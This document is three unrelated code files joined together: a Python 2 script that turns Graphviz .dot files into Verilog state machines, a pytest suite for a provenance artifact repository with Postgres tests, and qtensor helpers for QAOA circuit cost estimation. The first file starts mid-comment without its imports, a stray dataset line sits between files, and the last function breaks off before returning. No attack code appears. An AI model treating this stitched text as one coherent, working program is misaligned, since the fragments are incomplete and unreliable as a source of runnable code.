# checkForDuplicateTransitions), so it only runs under Python 2.

"""
Reads in a Graphviz .dot file and generates a Verilog state machine
based on some simple rules.
    1) Only one state transitions per line:
        state_name -> next_state_name;
        next_state_name -> next_next_state_name;
       not
        state_name -> next_state_name -> next_next_state_name;
    2) Events that cause state transitions are called "affectors" and are
       defined by .dot labels:
        state_name -> next_state_name [label = "start"];
       These events will generate input ports of the same name as the label.
"""


class StateTransition():
    # Records one source state and its outgoing transitions, each stored
    # as a (next_state, affector) tuple; affector is None for an
    # unconditional (default/same-state) transition.
    def __init__(self, state):
        self.state = state
        self.transitions = []   # list of (next_state, affector) tuples
        self.default = None     # NOTE(review): never assigned anywhere in this file

    # NOTE(review): presumably intended to be __str__; as written it must
    # be called explicitly as .str().
    def str(self):
        return self.state


class FSMGen():
    # Parses a Graphviz .dot FSM description and emits a Verilog module
    # (plus an include file of state parameters) via string templates.
    def __init__(self):
        self.__title = ""               # FSM title from the .dot 'label' line
        self.__unique_states = []       # state names in order of first appearance
        self.__num_states = 0
        self.__states = {}              # state name -> StateTransition
        self.__transitions = []         # NOTE(review): appended to nowhere in this
                                        # file; checkForDuplicateTransitions iterates it
        self.__unique_affectors = []    # affector names -> become input ports
        self.__default_state = None     # first state parsed; used for 'default:' arm
        self.__dotfile = None           # raw text of the parsed .dot file
        self.logger = logging.getLogger("FSMGen")
        h = NullHandler()
        logging.getLogger("FSMGen").addHandler(h)
        # Substitution map consumed by string.Template in writeVerilog /
        # writeIncludeFile.  Keys must match the placeholders in
        # vlogTemplate and incTemplate.
        self.subs = {
            'website': "https://github.com/inneralien/Tizzy",
            'dot_filename': "",
            'filename': "",
            'creation_date': "",
            'title': "",
            'module_name': "",
            'inputs': "",
            'msb': "",
            'lsb': "",
            'state_params': "",
            'range': "",
            'next_state_logic': "",
            'state_generator': "",
            'state_debug': "",
        }
        # Longest state-name length, used to column-align generated code.
        self.longest_state_str = 0

    def getUniqueStates(self):
        """ Returns the list of unique state names in parse order. """
        return self.__unique_states

    def checkForDefaultState(self):
        """ If the transition has an affector, check to see if there is also
            a same state transition with no affector.

            Raises MissingTransitionsError listing every state that has no
            unconditional (affector-less) transition.
        """
        self.logger.info("Checking for explicit same-state transitions")
        affector_states = []
        for state in self.__unique_states:
            # NOTE(review): if a state has zero transitions the inner loop
            # never runs and has_same_state_trans is unbound here
            # (NameError on first state, stale value afterwards).
            for trans in self.__states[state].transitions:
                if(trans[1] is None):
                    self.logger.debug("Has same state trans: %s" % (state))
                    has_same_state_trans = True
                    break
                else:
                    has_same_state_trans = False
            if(has_same_state_trans is False):
                affector_states.append(state)
        if(len(affector_states) > 0):
            raise MissingTransitionsError("addSameStateTransition",
                    "Some states may not have all transitions covered",
                    help.missing_transition_help,
                    affector_states)

    def checkForDuplicateTransitions(self):
        """ Takes a list of StateTransition objects and checks to see if
            there are any duplicate affectors that cause transitions from
            the same current state.
            i.e.
                IDLE -> P1 [label='run'];
                IDLE -> P2 [label='run'];
        """
        self.logger.info("Checking for duplicate state transitions")
        state_trans = []
        for t in self.__transitions:
            # Make a string of the three values
            if(t.affector is not None):
                val = t.state + t.state_next + t.affector
            else:
                val = t.state + t.state_next
            if(val in state_trans):
                raise DuplicateTransitionError("checkForDuplicateTransitions",
                        "A duplicate state transition was found\n %s -> %s" % (t.state, t.state_next),
                        None)
            else:
                state_trans.append(val)
        for i in state_trans:
            if(state_trans.count(i) > 1):
                print "More than once: %s" % i
        # NOTE(review): dead branch kept as-is; the duplicate-affector
        # check above already raises before reaching here.
        if(False):
            raise FSMError("Duplicate Affectors",
                    "Attempting multiple state transitions with the same affector")

    def parseDotFile(self, filename):
        """ The parser is looking for 3 things:
            1) FSM label
                label = "My Fancy State Machine"
            2) State transitions
                IDLE -> PIPE1;
            3) Explicit affectors which cause the state change
                IDLE -> PIPE1 [label = "rdy"];

            Checks:
            1) Same affector used to transition to multiple next states
               from the current state. i.e.
                IDLE -> P1 [label='run'];
                IDLE -> P2 [label='run'];
            2) No explicit same-state transition:
                IDLE -> P1 [label='run'];
               but missing:
                IDLE -> IDLE;
               The same-state transition will be created automatically.
        """
        re_fsm_name = re.compile(r'^\s*digraph\s*(\w+)')
        re_fsm_label = re.compile(r'^\s*label\s*=\s*\"(.*)\"')
        re_states = re.compile(r'^\s*(\w+)\s*->\s*(\w+)')
        re_affectors = re.compile(r'\[\s*label\s*=\s*\"(.*)\"\s*\]')

        self.subs['dot_filename'] = filename
        f = open(filename, 'r')
        self.__dotfile = f.read()
        f.close()

        # NOTE(review): 'file' shadows the builtin; kept byte-identical.
        file = self.__dotfile.split('\n')
        for line in file:
            st = None   # NOTE(review): assigned but never used
            ## Find FSM Module Name
            # NOTE(review): if no 'digraph <name>' line exists, self.__name
            # is never set and fillStringSubs raises AttributeError.
            m = re_fsm_name.search(line)
            if(m is not None):
                self.__name = m.group(1)
                self.logger.info("Found Module Name: %s" % self.__name)

            ## Find FSM Title
            m = re_fsm_label.search(line)
            if(m is not None):
                self.__title = m.group(1)
                self.logger.info("Found Title: %s" % self.__title)

            ## Find States and Next States
            m_state = re_states.search(line)
            if(m_state is not None):
                state = m_state.group(1)
                if state not in self.__unique_states:
                    self.__unique_states.append(state)
                    self.logger.debug("Adding state: %s" % state)
                    self.__states[state] = StateTransition(state)
                    # Track the longest name for later column alignment.
                    if(len(state) > self.longest_state_str):
                        self.longest_state_str = len(state)

                ## Find Transitions
                m_affector = re_affectors.search(line)
                if(m_affector is not None):
                    affector = m_affector.group(1)
                    ## Strip off ~ and ! etc. so compound expressions like
                    ## "~a & b" yield the plain signal names.
                    affector_stripped = re.sub('[~|!()&^]','',affector).split()
                    self.logger.debug("Stripped affectors: '%s'" % affector_stripped)
                    for i in affector_stripped:
                        if(i not in self.__unique_affectors):
                            self.logger.debug("Adding unique affector: '%s'" % i)
                            self.__unique_affectors.append(i)
                else:
                    affector = None
                next_state = m_state.group(2)
                self.logger.debug("Adding transition: %s -> %s (%s)" %
                        (state, next_state, affector))
                trans = (next_state, affector)
                if(trans in self.__states[state].transitions):
                    raise DuplicateTransitionError("checkForDuplicateTransitions",
                            "A duplicate state transition was found\n %s -> %s" % (state, next_state),
                            None)
                else:
                    self.__states[state].transitions.append((next_state, affector))

        # The first state encountered becomes the reset/default state.
        self.__default_state = self.__unique_states[0]
        self.__num_states = len(self.__unique_states)

        self.logger.debug("State Transitions:")
        for state in self.__unique_states:
            for trans in self.__states[state].transitions:
                self.logger.debug("    %s -> %s %s" % (state, trans[0], trans[1]))

    def getInputPorts(self):
        """ Creates and returns a string of input ports.
            NOTE(review): unimplemented stub; affector input ports are
            actually generated in fillStringSubs.
        """
        pass

    def getOutputPorts(self):
        """ Creates and returns a string of output ports.
            NOTE(review): unimplemented stub.
        """
        pass

    def genNextStateLogicString(self):
        """ Returns a string that represents the next state generator
            Verilog code.

            For each state: the first affector transition becomes 'if',
            subsequent ones 'else if', and the single affector-less
            transition becomes the trailing 'else'.
        """
        # NOTE(review): 'str' shadows the builtin; kept byte-identical.
        str = ""
        ## The first state is the default state
        for state in self.__unique_states:
            final_trans = None
            first_trans = None
            other_trans = []
            str += "      state[%s] :\n" % state
            num_trans = len(self.__states[state].transitions)
            for i in range(num_trans):
                remaining = num_trans - i
                trans = self.__states[state].transitions[i]
                self.logger.debug(remaining)
                if(trans[1] is None):
                    # Affector-less transition -> the 'else' (default) arm.
                    if(final_trans is None):
                        self.logger.debug("Final trans: %r %r" % (trans[0], trans[1]))
                        final_trans = trans
                    else:
                        raise MultipleDefaultTransitionsError('genNextStateLogicString',
                                None, None)
                else:
                    if(first_trans is None):
                        self.logger.debug("First trans: %r %r" % (trans[0], trans[1]))
                        first_trans = trans
                    else:
                        self.logger.debug("Other trans: %r %r" % (trans[0], trans[1]))
                        other_trans.append(trans)
            if(first_trans is not None):
                str += "        if(%s)\n" % first_trans[1]
                str += "          state_next[%s] = 1'b1;\n" % first_trans[0]
            # NOTE(review): 'other_trans is not None' is always True (it is
            # a list); the loop body simply doesn't run when it is empty.
            if(other_trans is not None):
                for trans in other_trans:
                    str += "        else if(%s)\n" % trans[1]
                    str += "          state_next[%s] = 1'b1;\n" % trans[0]
            if(final_trans is not None):
                # A lone unconditional transition needs no 'else' keyword.
                if(num_trans != 1):
                    str += "        else\n"
                str += "          state_next[%s] = 1'b1;\n" % final_trans[0]
        str += "      default:\n"
        str += "        state_next[%s] = 1'b1;" % self.__default_state
        return str

    def genStateGeneratorString(self):
        """ Returns a string that represents the state generator Verilog
            code (the reset assignment for the one-hot state register).
        """
        str = ""
        str += "      state <= `D %d'b0;\n" % self.__num_states
        str += "      state[%s] <= `D 1'b1;" % self.__default_state
        return str

    def genStateDebugString(self):
        """ Returns a string the represents some state debug Verilog code
            (an ASCII state-name register for waveform viewing, wrapped in
            synthesis translate_off/on pragmas).
        """
#        longest = 0
#        for state in self.__unique_states:
#            str_len = len(state)
#            if(str_len > longest):
#                longest = str_len
        str = ""
        str += "// synthesis translate_off\n"
        str += "// State names for simulation\n"
        str += "reg [79:0] state_string;\n"
        str += "always @(*)\n"
        str += "  case(1'b1)\n"
        for state in self.__unique_states:
            state_str = "state[%s]" % state
            str += '    %s : state_string = "%s";\n' % \
                    (state_str.ljust(8+self.longest_state_str), state)
        str += "  endcase\n"
        str += "// synthesis translate_on\n"
        return str

    def fillStringSubs(self):
        """ Populates self.subs with all generated strings prior to
            template substitution. Must be called after parseDotFile.
        """
#        self.subs['creation_date'] = time.strftime("%b %d %Y")
        self.subs['creation_date'] = time.strftime("%d-%b-%Y")
        self.subs['title'] = self.__title
        self.subs['module_name'] = self.__name
        # Each unique affector becomes an input port.
        for i in self.__unique_affectors:
            self.subs['inputs'] += "  input  wire %s,\n" % i
        self.subs['msb'] = self.__num_states-1
        self.subs['lsb'] = 0
        # One localparam per state, aligned on the longest state name.
        for i in range(self.__num_states):
            str = "    %s = %d" % \
                    (self.__unique_states[i].ljust(self.longest_state_str), i)
            if(i < self.__num_states-1):
                str += ",\n"
            else:
                str += ";"
            self.subs['state_params'] += str
        self.subs['range'] = self.__num_states
        self.subs['next_state_logic'] = self.genNextStateLogicString()
        self.subs['state_generator'] = self.genStateGeneratorString()
        self.subs['digraph'] = self.__dotfile
        self.subs['state_debug'] = self.genStateDebugString()

    def writeVerilog(self, version, filename=None, include_file=None):
        """ Writes the verilog using a string template.  If filename is None
            then stdout is used.

            Also writes the companion include file (default 'states.vh')
            via writeIncludeFile.
        """
        # Verilog Filename
        self.subs['version'] = version
        if(filename is None):
            self.subs['filename'] = "STDIO"
        else:
            self.subs['filename'] = filename

        # Include Filename
        if(include_file is None):
            include_file = "states.vh"
        # Only the basename is referenced from the generated Verilog.
        (head, tail) = os.path.split(include_file)
        self.subs['include_file'] = tail

        s = string.Template(vlogTemplate)
        self.fillStringSubs()
        if(filename is None):
            sys.stdout.write(s.safe_substitute(self.subs))
        else:
            f = open(self.subs['filename'], 'w')
            f.write(s.safe_substitute(self.subs))
            f.close()
        self.writeIncludeFile(version, include_file)

    def writeIncludeFile(self, version, filename=None):
        """ Writes an include file that contains the state parameters.
            NOTE(review): unlike writeVerilog, filename=None is not
            handled here; open(None, 'w') would raise.
        """
        sys.stderr.write("Writing include file: %s\n" % filename)
        s = string.Template(incTemplate)
        f = open(filename, 'w')
        f.write(s.safe_substitute(self.subs))
        f.close()


class FSMError(Exception):
    # Base class for all FSM generation errors.
    def __init__(self, method_name, error_message, long_message):
        Exception.__init__(self)
        self.method_name = method_name
        self.error_message = error_message
        self.long_message = long_message


class MissingTransitionsError(FSMError):
    # Raised when states lack an unconditional (default) transition;
    # carries the list of offending state names.
    def __init__(self, method_name, error_message, long_message, states):
        FSMError.__init__(self, method_name, error_message, long_message)
        self.states = states


class DuplicateTransitionError(FSMError):
    # Raised when the same (state, next_state, affector) appears twice.
    def __init__(self, method_name, error_message, long_message):
        FSMError.__init__(self, method_name, error_message, long_message)


class MultipleDefaultTransitionsError(FSMError):
    # Raised when a state has more than one affector-less transition.
    def __init__(self, method_name, error_message, long_message):
        FSMError.__init__(self, method_name, error_message, long_message)
# <gh_stars>0  -- dataset artifact, not valid Python; preserved as a comment.
"""Tests for provenance repositories (memory, chained, and Postgres-backed).

Relies on pytest fixtures defined in conftest: ``repo``, ``atomic_repo``,
``db_session``, ``disk_store``, and the ``artifact_record`` factory.  The
Postgres tests expect a reachable local server.
"""
from datetime import datetime
import copy

import pandas as pd
import pytest
import sqlalchemy_utils.functions as sql_utils

import provenance as p
import provenance._commonstore as cs
import provenance.blobstores as bs
import provenance.repos as r

from conftest import artifact_record


def test_inputs_json(db_session):
    # End-to-end check that a pipeline's recorded inputs serialize to the
    # expected JSON shape, and that re-running the (cached) pipeline
    # yields the same serialization.
    repo = r.DbRepo(db_session, bs.MemoryStore())

    @p.provenance(version=0, name='initial_data', repo=repo)
    def load_data(filename, timestamp):
        return {'data': [1, 2, 3], 'timestamp': timestamp}

    @p.provenance(repo=repo)
    def process_data_X(data, process_x_inc, timestamp):
        _data = [i + process_x_inc for i in data['data']]
        return {'data': _data, 'timestamp': timestamp}

    @p.provenance(repo=repo)
    def process_data_Y(data, process_y_inc, timestamp):
        _data = [i + process_y_inc for i in data['data']]
        return {'data': _data, 'timestamp': timestamp}

    @p.provenance(repo=repo)
    def combine_processed_data(filename, inc_x, inc_y, timestamp):
        _data = [a + b for a, b in zip(inc_x['data'], inc_y['data'])]
        return {'data': _data, 'timestamp': timestamp}

    def pipeline(filename, timestamp, process_x_inc, process_y_inc):
        data = load_data(filename, timestamp)
        inc_x = process_data_X(data, process_x_inc, timestamp)
        inc_y = process_data_Y(data, process_y_inc, timestamp)
        res = combine_processed_data(filename, inc_x, inc_y, timestamp)
        return {'data': data, 'inc_x': inc_x, 'inc_y': inc_y, 'res': res}

    now = datetime(2016, 9, 27, 7, 51, 11, 613544)

    # Artifact ids are content hashes, so they are stable across runs.
    expected_inputs_json = {
        "__varargs": [],
        "filename": "foo-bar",
        "timestamp": now,
        "inc_x": {
            "id": "c74da9d379234901fe7a89e03fa800b0",  # md5
            # "id": "2c33a362ebd51f830d0b245473ab6c1269674259", # sha1
            "name": "test_repos.process_data_X",
            "type": "ArtifactProxy"
        },
        "inc_y": {
            "id": "a1bd4d4ae1f33ae6379613618427f127",  # md5
            # "id": "f9b1bb7a8aaf435fbf60b92cd88bf6c46604f702", # sha1
            "name": "test_repos.process_data_Y",
            "type": "ArtifactProxy"
        }
    }

    results = pipeline(filename='foo-bar', process_x_inc=5, process_y_inc=10,
                       timestamp=now)
    res = results['res'].artifact
    inputs_json = r._inputs_json(res.inputs)
    assert inputs_json == expected_inputs_json

    # Second run hits the cache; the serialized inputs must not change.
    results = pipeline(filename='foo-bar', process_x_inc=5, process_y_inc=10,
                       timestamp=now)
    res = results['res'].artifact
    inputs_json = r._inputs_json(res.inputs)
    assert inputs_json == expected_inputs_json


def test_basic_repo_ops(repo):
    # put / contains / lookup by id and value_id / delete round-trip.
    artifact = artifact_record()

    assert artifact.id not in repo
    repo.put(artifact)

    assert artifact.id in repo
    assert artifact in repo

    # Re-putting the same artifact is an error, not an upsert.
    with pytest.raises(cs.KeyExistsError) as e:
        repo.put(artifact)

    assert repo.get_by_id(artifact.id).id == artifact.id
    assert repo[artifact.id].id == artifact.id
    assert repo.get_by_value_id(artifact.value_id).id == artifact.id

    repo.delete(artifact.id)
    assert artifact.id not in repo
    # Blob-backed repos must also remove the underlying blobs.
    if hasattr(repo, 'blobstore'):
        assert artifact.id not in repo.blobstore
        assert artifact.value_id not in repo.blobstore

    with pytest.raises(KeyError) as e:
        repo.delete(artifact.id)

    with pytest.raises(KeyError) as e:
        repo.get_by_id(artifact.id)

    with pytest.raises(KeyError) as e:
        repo.get_by_value_id(artifact.id)


@pytest.mark.parametrize('artifact_class', [r.ArtifactProxy, r.CallableArtifactProxy])
@pytest.mark.parametrize('copy_method', [copy.copy, copy.deepcopy])
def test_copy_Proxies(repo, artifact_class, copy_method):
    # Copying a proxy must detach it from the original's wrapped value.
    class Artifact():
        def __init__(self, id):
            self.id = id

    a = artifact_class({'a': 1, 'b': 2, 'c': 3}, Artifact('1'))
    b = copy_method(a)
    b['a'] = 10
    assert a['a'] != b['a']


def test_repo_set_put_and_finding(repo):
    artifact = artifact_record(id='123')
    repo.put(artifact)
    artifact_set = r.ArtifactSet([artifact.id], 'foo')
    repo.put_set(artifact_set)

    assert repo.get_set_by_id(artifact_set.id) == artifact_set
    found_set = repo.get_set_by_labels('foo')
    assert found_set.name == 'foo'
    assert found_set.artifact_ids == {'123'}


def test_repo_raises_key_error_when_set_id_not_found(repo):
    with pytest.raises(KeyError) as e:
        repo.get_set_by_id('foo')


def test_repo_raises_key_error_when_set_name_not_found(repo):
    with pytest.raises(KeyError) as e:
        repo.get_set_by_labels('foo')


def test_repo_contains_set(repo):
    assert not repo.contains_set('foo')
    artifact = artifact_record(id='123')
    repo.put(artifact)
    artifact_set = r.ArtifactSet([artifact.id], 'foo')
    repo.put_set(artifact_set)
    assert repo.contains_set(artifact_set.id)


def test_repo_delete_set(repo):
    artifact = artifact_record(id='123')
    repo.put(artifact)
    artifact_set = r.ArtifactSet(['123'], 'foo')
    repo.put_set(artifact_set)
    repo.delete_set(artifact_set.id)
    with pytest.raises(KeyError) as e:
        repo.get_set_by_id(artifact_set.id)


def test_permissions(atomic_repo):
    # Toggling the private _read/_write/_delete flags must gate every
    # corresponding operation with a PermissionError.
    repo = atomic_repo
    artifact = artifact_record()

    repo._write = False
    assert not repo._write
    with pytest.raises(cs.PermissionError) as e:
        repo.put(artifact)
    assert artifact not in repo

    repo._write = True
    repo.put(artifact)

    repo._read = False
    with pytest.raises(cs.PermissionError) as e:
        repo.get_by_id(artifact.id)
    with pytest.raises(cs.PermissionError) as e:
        repo.get_by_value_id(artifact.value_id)
    with pytest.raises(cs.PermissionError) as e:
        repo.get_value(artifact.id)
    with pytest.raises(cs.PermissionError) as e:
        repo.get_inputs(artifact)
    with pytest.raises(cs.PermissionError) as e:
        artifact.id in repo

    repo._read = True
    assert repo.get_by_id(artifact.id)
    assert artifact.id in repo

    repo._delete = False
    with pytest.raises(cs.PermissionError) as e:
        repo.delete(artifact.id)

    repo._delete = True
    repo.delete(artifact.id)
    assert artifact.id not in repo


def test_chained_with_readonly():
    # A ChainedRepo reads from read-only members but writes only to
    # writable ones.
    read_repo = r.MemoryRepo([artifact_record(id='foo')],
                             read=True, write=False, delete=False)
    write_repo = r.MemoryRepo(read=True, write=True, delete=False)
    repos = [read_repo, write_repo]
    chained = r.ChainedRepo(repos)

    # verify we read from the read-only store
    assert 'foo' in chained
    # but that it is not written to
    record = artifact_record(id='bar', value_id='baz')
    chained.put(record)
    assert 'bar' in chained
    assert 'bar' in write_repo
    assert 'bar' not in read_repo
    assert chained.get_by_value_id(record.value_id).id == record.id
    assert chained.get_by_id(record.id).id == record.id
    assert chained.get_value(record) == record.value


def test_chained_read_through_write():
    # A hit found deeper in the chain is written back ("read-through")
    # only to earlier repos that opted in, and never propagated forward.
    foo = artifact_record(id='foo')
    read_repo = r.MemoryRepo([foo], read=True, write=False)
    repo_ahead = r.MemoryRepo(read=True, write=True, read_through_write=True)
    read_through_write_repo = r.MemoryRepo(read=True, write=True,
                                           read_through_write=True)
    no_read_through_write_repo = r.MemoryRepo(read=True, write=True,
                                              read_through_write=False)
    repos = [no_read_through_write_repo, read_through_write_repo,
             read_repo, repo_ahead]
    chained_repo = r.ChainedRepo(repos)

    assert 'foo' not in read_through_write_repo
    assert 'foo' not in no_read_through_write_repo
    assert 'foo' not in repo_ahead

    # verify we read from the read-only store
    assert chained_repo['foo'].id == foo.id
    assert 'foo' in read_through_write_repo
    assert 'foo' not in repo_ahead
    assert 'foo' not in no_read_through_write_repo


def test_chained_writes_may_be_allowed_on_read_throughs_only():
    # write=False with read_through_write=True means: never accept direct
    # puts, but do cache values found deeper in the chain.
    foo = artifact_record(id='foo')
    read_repo = r.MemoryRepo([foo], read=True, write=False)
    read_through_write_only_repo = r.MemoryRepo(read=True, write=False,
                                                read_through_write=True)
    write_repo = r.MemoryRepo(read=True, write=True, read_through_write=False)
    repos = [write_repo, read_through_write_only_repo, read_repo]
    chained_repo = r.ChainedRepo(repos)

    # verify we read from the read-only repo
    assert chained_repo['foo'].id == foo.id
    assert 'foo' in read_through_write_only_repo
    assert 'foo' not in write_repo

    bar = artifact_record(id='bar')
    chained_repo.put(bar)
    assert 'bar' in chained_repo
    assert 'bar' not in read_through_write_only_repo
    assert 'bar' in write_repo


def test_db_is_automatically_created_and_migrated(disk_store):
    # Requires a local Postgres server; the database is created, used,
    # and dropped within the test.
    db_conn_str = 'postgresql://localhost/test_provenance_autocreate'
    if sql_utils.database_exists(db_conn_str):
        sql_utils.drop_database(db_conn_str)

    repo = r.PostgresRepo(db_conn_str, disk_store,
                          read=True, write=True, delete=True,
                          create_db=True)
    p.set_default_repo(repo)

    @p.provenance()
    def calculate(a, b):
        return a + b

    assert sql_utils.database_exists(db_conn_str)

    # make sure it all works
    assert calculate(1, 2) == 3

    p.set_default_repo(None)
    sql_utils.drop_database(db_conn_str)


def test_db_is_automatically_created_and_migrated_with_the_right_schema(disk_store):
    # Two repos on the same database but different schemas must not see
    # each other's artifacts.
    db_conn_str = 'postgresql://localhost/test_provenance_autocreate_schema'
    if sql_utils.database_exists(db_conn_str):
        sql_utils.drop_database(db_conn_str)

    repo = r.PostgresRepo(db_conn_str, disk_store,
                          read=True, write=True, delete=True,
                          create_db=True, schema='foobar')
    p.set_default_repo(repo)

    @p.provenance()
    def calculate(a, b):
        return a + b

    assert calculate(1, 2) == 3

    with repo.session() as s:
        res = pd.read_sql("select * from foobar.artifacts", s.connection())

    repo2 = r.PostgresRepo(db_conn_str, disk_store,
                           read=True, write=True, delete=True,
                           create_db=True, schema='baz')
    p.set_default_repo(repo2)

    assert calculate(5, 5) == 10

    with repo2.session() as s:
        res = pd.read_sql("select * from baz.artifacts", s.connection())

    assert res.iloc[0]['inputs_json'] == {'b': 5, 'a': 5, '__varargs': []}

    p.set_default_repo(None)
    sql_utils.drop_database(db_conn_str)


# NOTE(review): 'xtest_' prefix deliberately disables collection by pytest;
# this exercises upgrade_db against a pre-existing empty database.
def xtest_db_is_automatically_migrated(disk_store):
    db_conn_str = 'postgresql://localhost/test_provenance_automigrate'
    if sql_utils.database_exists(db_conn_str):
        sql_utils.drop_database(db_conn_str)
    sql_utils.create_database(db_conn_str)

    repo = r.PostgresRepo(db_conn_str, disk_store,
                          read=True, write=True, delete=True,
                          create_db=False, upgrade_db=True)
    p.set_default_repo(repo)

    @p.provenance()
    def calculate(a, b):
        return a + b

    # make sure it all works
    assert calculate(1, 2) == 3

    p.set_default_repo(None)
    sql_utils.drop_database(db_conn_str)


def test_artifact_proxy_works_with_iterables():
    # Dunder methods like __next__ must pass through the proxy.
    class Foo(object):
        def __init__(self, a):
            self.a = a

        def __next__(self):
            return self.a

    foo = r.artifact_proxy(Foo(5), 'stub artifact')
    assert next(foo) == 5
import networkx as nx
import numpy as np
from itertools import repeat
from tqdm.auto import tqdm
import time
from multiprocessing.dummy import Pool

from qtensor.optimisation.TensorNet import QtreeTensorNet
from qtensor.optimisation.Optimizer import OrderingOptimizer, TamakiOptimizer, WithoutOptimizer, TamakiTrimSlicing, DefaultOptimizer
from qtensor.optimisation import RGreedyOptimizer, LateParOptimizer
from qtensor.utils import get_edge_subgraph

from qtensor import QtreeQAOAComposer, OldQtreeQAOAComposer, ZZQtreeQAOAComposer, DefaultQAOAComposer


def bethe_graph(p, degree):
    """Build a Bethe-lattice-like tree by growing ``p`` generations from one edge.

    Parameters:
        p: int, number of growth iterations
        degree: int, target vertex degree of interior nodes

    Returns: nx.Graph
    """
    def add_children_to_leafs(graph):
        """ Works in-place: attach degree-1 new children to every leaf. """
        leaves = [n for n in graph.nodes() if graph.degree(n) <= degree - 2]
        n = graph.number_of_nodes()
        for leaf in leaves:
            next_edges = [(leaf, n + x) for x in range(1, degree)]
            graph.add_edges_from(next_edges)
            # each leaf just received degree-1 fresh node ids; the original
            # hard-coded `n += 2`, which is only correct for degree == 3 and
            # made ids collide for any other degree
            n += degree - 1

    graph = nx.Graph()
    graph.add_edges_from([(0, 1)])
    for i in range(p):
        add_children_to_leafs(graph)
    return graph


def random_graph(nodes, type='random', **kwargs):
    """ Generate a random graph
    Parameters:
        nodes: int
            Number of nodes in the graph
        type: enum['random', 'erdos_renyi']
            algorithm to use
        **kwargs:
            keyword arguments to specific algorithm
            usually of form
            seed: int
            degree: int
    """
    if type == 'random':
        return nx.random_regular_graph(n=nodes, d=kwargs['degree'],
                                       seed=kwargs.get('seed'))
    if type == 'erdos_renyi':
        # expected degree `d` corresponds to edge probability d/(n-1)
        prob_of_edge_add = kwargs['degree'] / (nodes - 1)
        return nx.erdos_renyi_graph(n=nodes, p=prob_of_edge_add,
                                    seed=kwargs.get('seed'))
    raise ValueError('Unsupported graph type')


def get_slicing_algo(slicing_algo, par_vars, ordering_algo='default'):
    """Build a slicing optimizer from a string spec.

    ``'late-slice'`` or ``'late-slice_<n>'`` selects LateParOptimizer with
    ``n`` bunches (default 1). Raises ValueError for anything else.
    """
    if 'late-slice' in slicing_algo:
        if '_' in slicing_algo:
            _, bunch_size = slicing_algo.split('_')
            bunches = int(bunch_size)
        else:
            bunches = 1
        optimizer = LateParOptimizer(
            n_bunches=bunches, par_vars=par_vars, ordering_algo=ordering_algo
        )
    else:
        raise ValueError(f'Slicing algorithm not supported: {slicing_algo}')
    return optimizer


def get_ordering_algo(ordering_algo, par_vars=0):
    """
    Get optimizer instance from its string specifier.

    Supported specs:
        'tamaki' / 'tamaki_<wait>' / '...slice...' -> Tamaki variants
        'rgreedy' / 'rgreedy_<temp>' / 'rgreedy_<temp>_<repeats>'
        'greedy', 'default'
    Raises ValueError on anything else.
    """
    if 'tamaki' in ordering_algo:
        wait_time = 10
        if '_' in ordering_algo:
            params = ordering_algo.split('_')
            wait_time = float(params[-1])
        if 'slice' in ordering_algo:
            max_tw = 25
            optimizer = TamakiTrimSlicing(max_tw=max_tw, wait_time=wait_time)
        else:
            optimizer = TamakiOptimizer(wait_time=wait_time)

    elif 'rgreedy' in ordering_algo:
        if '_' in ordering_algo:
            params = ordering_algo.split('_')
            if len(params) == 2:
                _, temp = params
                repeats = 10
            else:
                _, temp, repeats = params
                repeats = int(repeats)
            temp = float(temp)
        else:
            temp = 2
            repeats = 10
        optimizer = RGreedyOptimizer(temp=temp, repeats=repeats)

    elif ordering_algo == 'greedy':
        optimizer = OrderingOptimizer()
    elif ordering_algo == 'default':
        optimizer = DefaultOptimizer()
    else:
        raise ValueError('Ordering algorithm not supported')
    return optimizer


# NOTE: a narrower duplicate `get_cost_params(circ, ordering_algo='greedy')`
# used to be defined here; it was dead code, silently shadowed by the
# `overflow_tw`-aware definition below, and has been removed.


def optimize_circuit(circ, algo='greedy', tamaki_time=15):
    """Build a tensor network from circuit gates and find an elimination order.

    Returns (peo, tn, opt) where `opt` exposes `.treewidth` after the call.
    """
    # Should I somomehow generalize the tamaki-time argument? provide something like
    # Optimizer-params argument? How would cli parse this?
    opt = get_ordering_algo(algo)
    tn = QtreeTensorNet.from_qtree_gates(circ)
    peo, tn = opt.optimize(tn)
    return peo, tn, opt


def get_tw(circ, ordering_algo='greedy', tamaki_time=15):
    """Return the treewidth of the contraction order found for `circ`."""
    peo, tn, opt = optimize_circuit(circ, algo=ordering_algo,
                                    tamaki_time=tamaki_time)
    treewidth = opt.treewidth
    return treewidth


def get_cost_params(circ, ordering_algo='greedy', overflow_tw=None):
    """Return (treewidth, max memory, total flops) of simulating `circ`.

    If `overflow_tw` is given and exceeded, skip the (possibly huge) cost
    evaluation and report infinite memory/flops instead.
    """
    peo, tn, opt = optimize_circuit(circ, algo=ordering_algo)
    treewidth = opt.treewidth
    if overflow_tw is not None and treewidth > overflow_tw:
        return treewidth, np.inf, np.inf
    mems, flops = tn.simulation_cost(peo)
    return treewidth, max(mems), sum(flops)


def qaoa_energy_lightcone_iterator(G, p, max_time=None, composer_type='default'):
    """Yield (circuit, subgraph) for the energy lightcone of every edge of G.

    gamma/beta are fixed placeholder angles; `max_time` (seconds), when
    truthy, stops iteration after the budget is exhausted.
    """
    gamma, beta = [0.1] * p, [0.3] * p
    start = time.time() if max_time else np.inf
    if composer_type == 'default':
        Composer = DefaultQAOAComposer
    elif composer_type == 'cylinder':
        Composer = OldQtreeQAOAComposer
    elif composer_type == 'cone':
        Composer = QtreeQAOAComposer
    elif composer_type == 'ZZ':
        Composer = ZZQtreeQAOAComposer
    else:
        allowed_composers = ['default', 'cylinder', 'cone', 'ZZ']
        raise Exception(f"Composer type not recognized, use one of: {allowed_composers}")

    for edge in G.edges():
        composer = Composer(G, beta=beta, gamma=gamma)
        composer.energy_expectation_lightcone(edge)
        subgraph = get_edge_subgraph(G, edge, len(beta))
        yield composer.circuit, subgraph
        # original compared elapsed time against max_time even when it was
        # None, raising TypeError; only enforce the budget when one was given
        if max_time and time.time() - start > max_time:
            break


def qaoa_energy_cost_params_stats_from_graph(G, p, max_time=0, max_tw=None,
                                             ordering_algo='greedy',
                                             print_stats=False):
    """Aggregate simulation cost over all edge lightcones of G.

    Returns (max treewidth, max memory, total flops) across edges.
    """
    tw = mem = flop = 0
    with tqdm(total=G.number_of_edges(), desc='Edge iteration') as pbar:
        for circ, subgraph in qaoa_energy_lightcone_iterator(G, p, max_time=max_time):
            # BUGFIX: original shadowed this function's helper with a local
            # list `cost_params = []` and then called the list -> TypeError.
            _tw, _m, _f = get_cost_params(circ, ordering_algo=ordering_algo,
                                          overflow_tw=max_tw)
            tw = max(tw, _tw)
            mem = max(mem, _m)
            flop += _f
